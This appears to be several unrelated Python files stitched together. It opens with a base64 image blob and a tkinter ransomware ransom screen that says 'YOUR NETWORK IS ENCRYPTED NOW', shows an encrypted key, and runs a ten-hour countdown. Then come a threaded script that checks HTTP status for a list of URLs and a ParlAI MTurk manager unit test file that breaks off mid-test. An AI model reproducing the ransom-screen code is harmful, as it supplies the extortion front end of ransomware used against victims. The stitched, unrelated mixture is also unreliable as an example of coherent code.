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'''
photo = PhotoImage(data=photo_code)
photo = photo.subsample(4)
label = Label(self, image=photo, background='black')
label.image = photo # keep a reference!
label.grid(row=5, column=0, rowspan=2)
label = Label(self, image=photo, background='black')
label.image = photo # keep a reference!
label.grid(row=5, column=3, rowspan=2)
message = f'''[COMPANY_NAME]
YOUR NETWORK IS ENCRYPTED NOW
USE - TO GET THE PRICE FOR YOUR DATA
DO NOT GIVE THIS EMAIL TO 3RD PARTIES
DO NOT RENAME OR MOVE THE FILE
THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY
[begin_key]
%s
[end_key]
KEEP IT
'''%(self.encrypted_key_b64)
Label(self, text=message, wraplength=550, font='Helvetica 14 bold', foreground='white',
background='red').grid(row=0, column=0, columnspan=4)
Label(self, text='', font='Helvetica 18 bold', foreground='red',
background='black').grid(row=5, column=2)
Label(self, text='', font='Helvetica 18 bold', foreground='red',
background='black').grid(row=6, column=2)
def start_thread():
# Start timer as thread
thread = threading.Thread(target=start_timer)
thread.daemon = True
thread.start()
def start_timer():
Label(self, text='TIME LEFT:', font='Helvetica 18 bold', foreground='red',
background='black').grid(row=5, column=0, columnspan=4)
try:
s = 36000 # 10 hours
while s:
min, sec = divmod(s, 60)
time_left = '{:02d}:{:02d}'.format(min, sec)
Label(self, text=time_left, font='Helvetica 18 bold', foreground='red',
background='black').grid(row=6, column=0, columnspan=4)
time.sleep(1)
s -= 1
except KeyboardInterrupt:
print('Closed...')
if os == 'Windows':
pass
else:
start_thread()
|
multithread.py
|
#!/usr/bin/python3
from threading import Thread
import http.client, sys
import queue
import requests
concurrent = 8
def doWork():
while True:
url = q.get()
status, url = getStatus(url)
doSomethingWithResult(status, url)
q.task_done()
def getStatus(ourl):
try:
req = requests.head(ourl, timeout=10, proxies={'http':'','https':''})
status = str(req.status_code)
return status, ourl
except:
return "error", ourl
def doSomethingWithResult(status, url):
print(status, url)
q = queue.Queue(concurrent * 2)
for i in range(concurrent):
t = Thread(target=doWork)
t.daemon = True
t.start()
try:
for url in open('output/OK.lst'):
q.put(url.strip())
q.join()
except KeyboardInterrupt:
sys.exit(1)
|
test_mturk_manager.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import os
import time
import json
import threading
import pickle
from unittest import mock
from parlai.mturk.core.worker_manager import WorkerManager
from parlai.mturk.core.agents import MTurkAgent
from parlai.mturk.core.shared_utils import AssignState
from parlai.mturk.core.mturk_manager import MTurkManager
from parlai.mturk.core.socket_manager import SocketManager, Packet
from parlai.core.params import ParlaiParser
from websocket_server import WebsocketServer
import parlai.mturk.core.mturk_manager as MTurkManagerFile
import parlai.mturk.core.data_model as data_model
import parlai.utils.testing as testing_utils
parent_dir = os.path.dirname(os.path.abspath(__file__))
MTurkManagerFile.parent_dir = os.path.dirname(os.path.abspath(__file__))
MTurkManagerFile.mturk_utils = mock.MagicMock()
# Lets ignore the logging part
MTurkManagerFile.shared_utils.print_and_log = mock.MagicMock()
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_WORKER_ID_2 = 'TEST_WORKER_ID_2'
TEST_WORKER_ID_3 = 'TEST_WORKER_ID_3'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_ASSIGNMENT_ID_2 = 'TEST_ASSIGNMENT_ID_2'
TEST_ASSIGNMENT_ID_3 = 'TEST_ASSIGNMENT_ID_3'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_HIT_ID_2 = 'TEST_HIT_ID_2'
TEST_HIT_ID_3 = 'TEST_HIT_ID_3'
FAKE_ID = 'BOGUS'
def assert_equal_by(val_func, val, max_time):
start_time = time.time()
while val_func() != val:
assert (
time.time() - start_time < max_time
), "Value was not attained in specified time"
time.sleep(0.1)
class MockSocket:
def __init__(self):
self.last_messages = {}
self.connected = False
self.disconnected = False
self.closed = False
self.ws = None
self.should_heartbeat = True
self.fake_workers = []
self.port = None
self.launch_socket()
self.handlers = {}
while self.ws is None:
time.sleep(0.05)
time.sleep(1)
def send(self, packet):
self.ws.send_message_to_all(packet)
def close(self):
if not self.closed:
self.ws.server_close()
self.ws.shutdown()
self.closed = True
def do_nothing(self, *args):
pass
def launch_socket(self):
def on_message(client, server, message):
if self.closed:
raise Exception('Socket is already closed...')
if message == '':
return
packet_dict = json.loads(message)
if packet_dict['content']['id'] == 'WORLD_ALIVE':
self.ws.send_message(client, json.dumps({'type': 'conn_success'}))
self.connected = True
elif packet_dict['content']['type'] == 'heartbeat':
pong = packet_dict['content'].copy()
pong['type'] = 'pong'
self.ws.send_message(
client,
json.dumps(
{'type': data_model.SOCKET_ROUTE_PACKET_STRING, 'content': pong}
),
)
if 'receiver_id' in packet_dict['content']:
receiver_id = packet_dict['content']['receiver_id']
use_func = self.handlers.get(receiver_id, self.do_nothing)
use_func(packet_dict['content'])
def on_connect(client, server):
pass
def on_disconnect(client, server):
self.disconnected = True
def run_socket(*args):
port = 3030
while self.port is None:
try:
self.ws = WebsocketServer(port, host='127.0.0.1')
self.port = port
except OSError:
port += 1
self.ws.set_fn_client_left(on_disconnect)
self.ws.set_fn_new_client(on_connect)
self.ws.set_fn_message_received(on_message)
self.ws.run_forever()
self.listen_thread = threading.Thread(
target=run_socket, name='Fake-Socket-Thread'
)
self.listen_thread.daemon = True
self.listen_thread.start()
class InitTestMTurkManager(unittest.TestCase):
"""
Unit tests for MTurkManager setup.
"""
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
def tearDown(self):
self.mturk_manager.shutdown()
def test_init(self):
manager = self.mturk_manager
opt = self.opt
self.assertIsNone(manager.server_url)
self.assertIsNone(manager.topic_arn)
self.assertIsNone(manager.server_task_name)
self.assertIsNone(manager.task_group_id)
self.assertIsNone(manager.run_id)
self.assertIsNone(manager.task_files_to_copy)
self.assertIsNone(manager.onboard_function)
self.assertIsNone(manager.socket_manager)
self.assertFalse(manager.is_shutdown)
self.assertFalse(manager.is_unique)
self.assertEqual(manager.opt, opt)
self.assertEqual(manager.mturk_agent_ids, self.mturk_agent_ids)
self.assertEqual(manager.is_sandbox, opt['is_sandbox'])
self.assertEqual(manager.num_conversations, opt['num_conversations'])
self.assertEqual(manager.is_sandbox, opt['is_sandbox'])
self.assertGreaterEqual(
manager.required_hits, manager.num_conversations * len(self.mturk_agent_ids)
)
self.assertIsNotNone(manager.agent_pool_change_condition)
self.assertEqual(manager.minimum_messages, opt.get('min_messages', 0))
self.assertEqual(
manager.auto_approve_delay, opt.get('auto_approve_delay', 5 * 24 * 3600)
)
self.assertEqual(manager.has_time_limit, opt.get('max_time', 0) > 0)
self.assertIsInstance(manager.worker_manager, WorkerManager)
self.assertEqual(manager.task_state, manager.STATE_CREATED)
def test_init_state(self):
manager = self.mturk_manager
manager._init_state()
self.assertEqual(manager.agent_pool, [])
self.assertEqual(manager.hit_id_list, [])
self.assertEqual(manager.conversation_index, 0)
self.assertEqual(manager.started_conversations, 0)
self.assertEqual(manager.completed_conversations, 0)
self.assertEqual(manager.task_threads, [])
self.assertTrue(manager.accepting_workers, True)
self.assertIsNone(manager.qualifications)
self.assertGreater(manager.time_limit_checked, time.time() - 1)
self.assertEqual(manager.task_state, manager.STATE_INIT_RUN)
class TestMTurkManagerUnitFunctions(unittest.TestCase):
"""
Tests some of the simpler MTurkManager functions that don't require much additional
state to run.
"""
def setUp(self):
self.fake_socket = MockSocket()
time.sleep(0.1)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args([], print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
self.mturk_agent_ids = ['mturk_agent_1', 'mturk_agent_2']
self.mturk_manager = MTurkManager(
opt=self.opt, mturk_agent_ids=self.mturk_agent_ids, is_test=True
)
self.mturk_manager._init_state()
self.mturk_manager.port = self.fake_socket.port
self.agent_1 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_1,
TEST_ASSIGNMENT_ID_1,
TEST_WORKER_ID_1,
)
self.agent_2 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_2,
TEST_ASSIGNMENT_ID_2,
TEST_WORKER_ID_2,
)
self.agent_3 = MTurkAgent(
self.opt,
self.mturk_manager,
TEST_HIT_ID_3,
TEST_ASSIGNMENT_ID_3,
TEST_WORKER_ID_3,
)
def tearDown(self):
self.mturk_manager.shutdown()
self.fake_socket.close()
def test_move_to_waiting(self):
manager = self.mturk_manager
manager.worker_manager.change_agent_conversation = mock.MagicMock()
manager.socket_manager = mock.MagicMock()
manager.socket_manager.close_channel = mock.MagicMock()
manager.force_expire_hit = mock.MagicMock()
self.agent_1.set_status(AssignState.STATUS_DISCONNECT)
self.agent_1.reduce_state = mock.MagicMock()
self.agent_2.reduce_state = mock.MagicMock()
self.agent_3.reduce_state = mock.MagicMock()
# Test with a disconnected agent, assert the channel is closed
manager._move_agents_to_waiting([self.agent_1])
self.agent_1.reduce_state.assert_called_once()
manager.socket_manager.close_channel.assert_called_once_with(
self.agent_1.get_connection_id()
)
manager.worker_manager.change_agent_conversation.assert_not_called()
manager.force_expire_hit.assert_not_called()
manager.socket_manager.close_channel.reset_mock()
# Test with a connected agent, should be moved to waiting
manager._move_agents_to_waiting([self.agent_2])
self.agent_2.reduce_state.assert_not_called()
manager.socket_manager.close_channel.assert_not_called()
manager.worker_manager.change_agent_conversation.assert_called_once()
args = manager.worker_manager.change_agent_conversation.call_args[1]
self.assertEqual(args['agent'], self.agent_2)
self.assertTrue(manager.is_waiting_world(args['conversation_id']))
self.assertEqual(args['new_agent_id'], 'waiting')
manager.force_expire_hit.assert_not_called()
manager.worker_manager.change_agent_conversation.reset_mock()
# Test when no longer accepting agents
manager.accepting_workers = False
manager._move_agents_to_waiting([self.agent_3])
self.agent_3.reduce_state.assert_not_called()
manager.socket_manager.close_channel.assert_not_called()
manager.worker_manager.change_agent_conversation.assert_not_called()
manager.force_expire_hit.assert_called_once_with(
self.agent_3.worker_id, self.agent_3.assignment_id
)
